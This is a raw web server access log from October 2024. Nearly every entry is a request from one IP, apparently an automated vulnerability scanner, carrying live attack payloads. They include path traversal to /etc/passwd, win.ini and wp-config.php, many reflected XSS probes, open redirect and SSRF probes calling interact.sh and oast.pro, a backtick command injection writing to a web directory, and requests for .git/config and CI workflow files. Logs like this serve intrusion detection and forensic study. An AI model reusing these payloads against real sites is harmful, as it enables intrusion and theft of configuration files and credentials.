195.164.49.69 - - [20/Oct/2024:20:29:28 +0000] GET /register HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:29:30 +0000] GET /resource/file%3a///etc/passwd/ HTTP/1.1 404 1128
195.164.49.69 - - [20/Oct/2024:20:29:52 +0000] GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:30:13 +0000] GET /?wahi=JzthbGVydChkb2N1bWVudC5kb21haW4pOy8v HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:30:16 +0000] GET /i3geo/pacotes/linkedinoauth/example/access_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1142
195.164.49.69 - - [20/Oct/2024:20:30:18 +0000] GET /cgi-bin/cgiServer.exx?page=../../../../../../../../../../../etc/passwd HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:30:39 +0000] GET /auth/logout?continue=//interact.sh HTTP/1.1 404 1089
83.212.98.101 - - [20/Oct/2024:20:30:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:31:01 +0000] GET /resource/md/get/url?url=http://oast.pro HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:31:03 +0000] GET /index.php?s=example HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:31:05 +0000] GET /data/v3/?key=%27-alert(document.domain)-%27 HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:31:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:31:09 +0000] GET /index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:31:11 +0000] GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1 400 1160
195.164.49.69 - - [20/Oct/2024:20:31:33 +0000] GET /loginsave.php?u=http://interact.sh HTTP/1.1 404 1087
195.164.49.69 - - [20/Oct/2024:20:31:34 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:31:37 +0000] GET /wp-login.php?wp_lang=en_US%27 HTTP/1.1 404 1086
195.164.49.69 - - [20/Oct/2024:20:31:39 +0000] GET /index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:32:00 +0000] GET /cms/info.php?mod=list%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:32:02 +0000] GET /i3geo/pacotes/linkedinoauth/example/request_token.php?=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 404 1143
195.164.49.69 - - [20/Oct/2024:20:32:04 +0000] GET /pub/bscw.cgi/30?op=theme&style_name=../../../../../../../../etc/passwd HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:32:24 +0000] GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1 404 1096
83.212.98.101 - - [20/Oct/2024:20:32:27 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:32:28 +0000] GET /sync/dropbox/download?challenge=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:32:30 +0000] GET /index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:20:32:31 +0000] GET /?query=SHOW%20DATABASES HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:32:33 +0000] GET /Content/Plugins/uploader/FileChoose.html HTTP/1.1 404 1126
195.164.49.69 - - [20/Oct/2024:20:32:35 +0000] GET /index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:32:37 +0000] GET /redirector.php?url=https://interact.sh HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:32:39 +0000] GET /redirector.php?do=nodelay&url=https://interact.sh HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:32:41 +0000] GET /include/downmix.inc.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:32:43 +0000] GET /wp-content/backups-dup-lite/tmp/ HTTP/1.1 404 1118
195.164.49.69 - - [20/Oct/2024:20:32:45 +0000] GET /wp-content/backups-dup-lite HTTP/1.1 404 1105
195.164.49.69 - - [20/Oct/2024:20:32:47 +0000] GET /wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd HTTP/1.1 404 1141
195.164.49.69 - - [20/Oct/2024:20:32:49 +0000] GET /installation/index.php HTTP/1.1 404 1100
195.164.49.69 - - [20/Oct/2024:20:32:51 +0000] GET /cgi-bin/cosmobdf.cgi?function=0 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:32:52 +0000] GET /cgi-bin/cosmobdf.cgi?function=1 HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:32:54 +0000] GET /webadmin/authportal/bounce.php?url=https://interact.sh/ HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:32:56 +0000] GET /%0A/interact.sh/ HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:32:58 +0000] GET /visualrf/group_list.xml?aps=1&start=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&end=500&match HTTP/1.1 404 1101
- - - [20/Oct/2024:20:32:59 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:33:02 +0000] GET /?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:33:04 +0000] GET /.circleci/config.yml HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:33:05 +0000] GET /mdocs-posts/?mdocs-img-preview=../../../wp-config.php HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:33:07 +0000] GET /?mdocs-img-preview=../../../wp-config.php HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:33:10 +0000] GET /wp-content/plugins/wp-integrator/readme.txt HTTP/1.1 404 1129
195.164.49.69 - - [20/Oct/2024:20:33:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:33:15 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:33:17 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:33:21 +0000] PUT /_snapshot/test HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:20:33:23 +0000] PUT /_snapshot/test2 HTTP/1.1 405 1050
195.164.49.69 - - [20/Oct/2024:20:33:25 +0000] GET /_snapshot/test/backdata%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1 400 1169
195.164.49.69 - - [20/Oct/2024:20:33:47 +0000] GET /wp-content/plugins/e-search/readme.txt HTTP/1.1 404 1124
195.164.49.69 - - [20/Oct/2024:20:33:49 +0000] GET /wp-content/plugins/photoxhibit/readme.txt HTTP/1.1 404 1127
195.164.49.69 - - [20/Oct/2024:20:33:58 +0000] POST /rest/issueNav/1/issueTable HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:34:01 +0000] GET /index.php?route=/ HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:34:05 +0000] POST /menu/stapp HTTP/1.1 404 1088
195.164.49.69 - - [20/Oct/2024:20:34:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:34:09 +0000] GET /?author=1 HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:34:13 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:34:19 +0000] GET /wp-content/plugins/elementor/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:34:21 +0000] POST /wp-admin/admin-ajax.php HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:34:23 +0000] GET /api/help'onmouseover=alert(document.domain)/'/;/beta/license HTTP/1.1 404 1162
195.164.49.69 - - [20/Oct/2024:20:34:25 +0000] POST /cas/v1/tickets/ HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:34:29 +0000] POST /wp-admin/admin.php?page=vfb-export HTTP/1.1 404 1096
195.164.49.69 - - [20/Oct/2024:20:34:31 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:34:35 +0000] HEAD /wp-login.php HTTP/1.1 404 -
- - - [20/Oct/2024:20:34:36 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:34:39 +0000] GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1 404 1131
- - - [20/Oct/2024:20:34:41 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:34:45 +0000] GET /goform/downloadSyslog/syslog.log HTTP/1.1 404 1114
195.164.49.69 - - [20/Oct/2024:20:34:47 +0000] GET /index.php?module=users/login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:34:51 +0000] GET /index.php?module=users/login HTTP/1.1 404 1083
195.164.49.69 - - [20/Oct/2024:20:34:57 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:34:59 +0000] POST /api/add-article-by-text HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:35:04 +0000] POST / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:07 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:12 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:15 +0000] GET / HTTP/1.1 200 11204
- - - [20/Oct/2024:20:35:17 +0000] GET null HTTP/1.1 400 2308
195.164.49.69 - - [20/Oct/2024:20:35:19 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:21 +0000] POST /api/2.0/mlflow/users/create HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:20:35:23 +0000] POST /login?next=https://sdc.iopan.pl:443 HTTP/1.1 404 1079
195.164.49.69 - - [20/Oct/2024:20:35:26 +0000] POST /save.php HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:35:29 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:31 +0000] POST /settings HTTP/1.1 404 1082
195.164.49.69 - - [20/Oct/2024:20:35:32 +0000] GET /api/v1/settings HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:35:35 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:37 +0000] GET /wp-content/plugins/siteguard/readme.txt HTTP/1.1 404 1125
195.164.49.69 - - [20/Oct/2024:20:35:39 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:35:41 +0000] POST /models/apply HTTP/1.1 404 1090
195.164.49.69 - - [20/Oct/2024:20:35:43 +0000] GET /vpn/list_base_config.php?type=mod&parts=base_config&template=%60echo%20-e%20%272niWU62ekYHtRrNAOhbKeBWSQ7b%27%3E%20%2Fwww%2Ftmp%2Finfo.html%60 HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:35:45 +0000] GET /tmp/info.html HTTP/1.1 404 1091
83.212.98.101 - - [20/Oct/2024:20:35:45 +0000] GET /ReplicationManager/monitoring/ HTTP/1.1 200 111
195.164.49.69 - - [20/Oct/2024:20:36:05 +0000] GET /index/ajax/lang?lang=../../application/database HTTP/1.1 404 1097
195.164.49.69 - - [20/Oct/2024:20:36:07 +0000] GET /lib../.git/config HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /static../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /js../.git/config HTTP/1.1 404 1098
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /images../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /img../.git/config HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /css../.git/config HTTP/1.1 404 1099
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /assets../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:36:15 +0000] GET /content../.git/config HTTP/1.1 404 1103
195.164.49.69 - - [20/Oct/2024:20:36:16 +0000] GET /events../.git/config HTTP/1.1 404 1102
195.164.49.69 - - [20/Oct/2024:20:36:16 +0000] GET /media../.git/config HTTP/1.1 404 1101
195.164.49.69 - - [20/Oct/2024:20:36:58 +0000] GET /.github/workflows/CI.yml HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/ci.yml HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/ci.yaml HTTP/1.1 404 1107
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/tests.yml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/main.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/main.yaml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/build.yml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:36:59 +0000] GET /.github/workflows/build.yaml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:37:00 +0000] GET /.github/workflows/test.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:37:00 +0000] GET /.github/workflows/test.yaml HTTP/1.1 404 1109
195.164.49.69 - - [20/Oct/2024:20:37:01 +0000] GET /.github/workflows/ci-issues.yml HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:20:37:01 +0000] GET /.github/workflows/tests.yaml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:37:01 +0000] GET /.github/workflows/release.yml HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:37:01 +0000] GET /.github/workflows/publish.yml HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:37:01 +0000] GET /.github/workflows/deploy.yml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:37:01 +0000] GET /.github/workflows/push.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/lint.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/coverage.yml HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/release.yaml HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/pr.yml HTTP/1.1 404 1106
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/automerge.yml HTTP/1.1 404 1113
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/docker.yml HTTP/1.1 404 1110
195.164.49.69 - - [20/Oct/2024:20:37:02 +0000] GET /.github/workflows/ci-generated.yml HTTP/1.1 404 1116
195.164.49.69 - - [20/Oct/2024:20:37:03 +0000] GET /.github/workflows/ci-push.yml HTTP/1.1 404 1111
195.164.49.69 - - [20/Oct/2024:20:37:03 +0000] GET /.github/workflows/ci-daily.yml HTTP/1.1 404 1112
195.164.49.69 - - [20/Oct/2024:20:37:18 +0000] GET /.github/workflows/smoosh-status.yml HTTP/1.1 404 1117
195.164.49.69 - - [20/Oct/2024:20:37:18 +0000] GET /.github/workflows/snyk.yml HTTP/1.1 404 1108
195.164.49.69 - - [20/Oct/2024:20:37:21 +0000] GET / HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:26 +0000] GET /?tab=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tab%27%29%3E&domain=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-domain%27%29%3E&show=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-show%27%29%3E&submit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-submit%27%29%3E&move=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-move%27%29%3E&userid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-userid%27%29%3E&oitar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-oitar%27%29%3E&key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-key%27%29%3E&description=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-description%27%29%3E&user=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user%27%29%3E&active=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-active%27%29%3E&clone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-clone%27%29%3E&success=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-success%27%29%3E&slug=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-slug%27%29%3E HTTP/1.1 200 11204
83.212.98.101 - - [20/Oct/2024:20:37:26 +0000] GET /ReplicationManager/ HTTP/1.1 200 2074
195.164.49.69 - - [20/Oct/2024:20:37:29 +0000] GET /?redirect=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-redirect%27%29%3E&linkcheck=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-linkcheck%27%29%3E&port=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-port%27%29%3E&password=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-password%27%29%3E&target=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-target%27%29%3E&method=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-method%27%29%3E¬e=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-note%27%29%3E&amount=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-amount%27%29%3E&set=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-set%27%29%3E&q=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-q%27%29%3E&select=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-select%27%29%3E&cid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cid%27%29%3E&tag=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag%27%29%3E&keyword=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-keyword%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:31 +0000] GET /?u=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-u%27%29%3E&groups=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-groups%27%29%3E&signup_for=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-signup_for%27%29%3E&user_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_id%27%29%3E&type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-type%27%29%3E&desc=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-desc%27%29%3E&newcontent=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-newcontent%27%29%3E&foo=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-foo%27%29%3E&message=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-message%27%29%3E&d=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-d%27%29%3E&width=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-width%27%29%3E&_wp_http_referer=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_wp_http_referer%27%29%3E&post_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_status%27%29%3E&author=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-author%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:31 +0000] GET /?send=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-send%27%29%3E&attachment_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment_id%27%29%3E&wp_screen_options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-wp_screen_options%27%29%3E&page_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page_id%27%29%3E&locale=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-locale%27%29%3E&function=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-function%27%29%3E&profile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-profile%27%29%3E&day=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-day%27%29%3E&folder=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-folder%27%29%3E&mobile=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-mobile%27%29%3E&settings=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-settings%27%29%3E&comments=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comments%27%29%3E&all=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-all%27%29%3E&menu=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-menu%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:31 +0000] GET /?uname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-uname%27%29%3E&command=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-command%27%29%3E&reverse=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-reverse%27%29%3E&cancel=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-cancel%27%29%3E&h=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-h%27%29%3E&logout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-logout%27%29%3E§ion=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-section%27%29%3E&gid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-gid%27%29%3E&input=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-input%27%29%3E&post_type=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_type%27%29%3E&page=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-page%27%29%3E&updated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-updated%27%29%3E&charset=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-charset%27%29%3E&v=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-v%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:31 +0000] GET /?t=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-t%27%29%3E&comment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment%27%29%3E&post_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post_id%27%29%3E&postid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-postid%27%29%3E&config=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-config%27%29%3E&login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-login%27%29%3E&paged=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-paged%27%29%3E&go=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-go%27%29%3E&tag_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-tag_ID%27%29%3E&user_login=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_login%27%29%3E&part=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-part%27%29%3E&preview_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-preview_id%27%29%3E&_ajax_nonce=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-_ajax_nonce%27%29%3E&widget-id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget-id%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?activated=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activated%27%29%3E&trigger=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-trigger%27%29%3E&loggedout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-loggedout%27%29%3E&script=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-script%27%29%3E&query=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-query%27%29%3E&file_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-file_name%27%29%3E&fname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fname%27%29%3E&options=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-options%27%29%3E&export=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-export%27%29%3E&post=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-post%27%29%3E&p=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-p%27%29%3E&action2=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-action2%27%29%3E&c=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-c%27%29%3E&destination=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-destination%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?rememberme=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rememberme%27%29%3E&module=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-module%27%29%3E&comment_ID=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-comment_ID%27%29%3E&client_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-client_id%27%29%3E&noheader=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-noheader%27%29%3E&del=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-del%27%29%3E&media=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-media%27%29%3E&user_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-user_name%27%29%3E&country=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-country%27%29%3E&phone=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-phone%27%29%3E&sidebar=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-sidebar%27%29%3E&version=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-version%27%29%3E&widget_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-widget_id%27%29%3E&class=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-class%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?title=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-title%27%29%3E&view=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-view%27%29%3E&context=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-context%27%29%3E&passwd=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-passwd%27%29%3E&count=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-count%27%29%3E&delete=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-delete%27%29%3E&test=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-test%27%29%3E&hash=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-hash%27%29%3E&csrf_token=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-csrf_token%27%29%3E&o=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-o%27%29%3E&activate=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-activate%27%29%3E&edit=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-edit%27%29%3E&ip=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ip%27%29%3E&r=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-r%27%29%3E HTTP/1.1 200 11204
195.164.49.69 - - [20/Oct/2024:20:37:32 +0000] GET /?attachment=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-attachment%27%29%3E&dbname=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-dbname%27%29%3E&rows=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-rows%27%29%3E&parent_id=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-parent_id%27%29%3E&lang=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-lang%27%29%3E&fid=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-fid%27%29%3E&text=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-text%27%29%3E&link=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-link%27%29%3E&timeout=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-timeout%27%29%3E&db_name=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-db_name%27%29%3E&ids=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-ids%27%29%3E&w=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-w%27%29%3E&provider=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-provider%27%29%3E&plugin_status=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss-plugin_status%27%29%3E HTTP/1.1 200 11204
